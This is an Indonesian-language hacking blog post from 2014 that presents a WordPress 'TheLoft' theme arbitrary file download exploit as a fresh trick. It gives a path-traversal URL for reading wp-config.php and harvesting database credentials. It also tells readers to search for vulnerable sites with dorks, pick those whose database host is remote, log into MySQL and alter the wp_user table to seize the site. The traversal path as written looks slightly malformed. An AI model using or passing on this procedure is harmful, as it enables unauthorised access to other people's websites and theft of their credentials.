Kamis, 18 September 2014

Assallamuallaikum ^_^

Jumpa Lagi Dengan Saya :D
Dapet trik dari teman kerja saya , namanya Koko :D
nama expolit ini adalah Wordpress TheLoft Arbitrary File Download Vulnerabillity , termasuk exploit baru :v
tinggal bagaimana dork yang kita gunakan :D

ok langsung saja
Exploit : http://localhost?wp-content/theme/TheLoft/download.php?file=../../..wp-config.php

buka file wp-config.php nya , nah .disitu ada user dan password untuk login ke databasenya
lihat gambar :


nah , jika DB hostnya localhost , cari yang lain lagi , cari yang pakai url/server :D
login MySql , modif wp_user nya

ok , sekian dari saya :D
Copas ?
sertakan sumber ya ^_^

Special Thanks : Koko


EmoticonEmoticon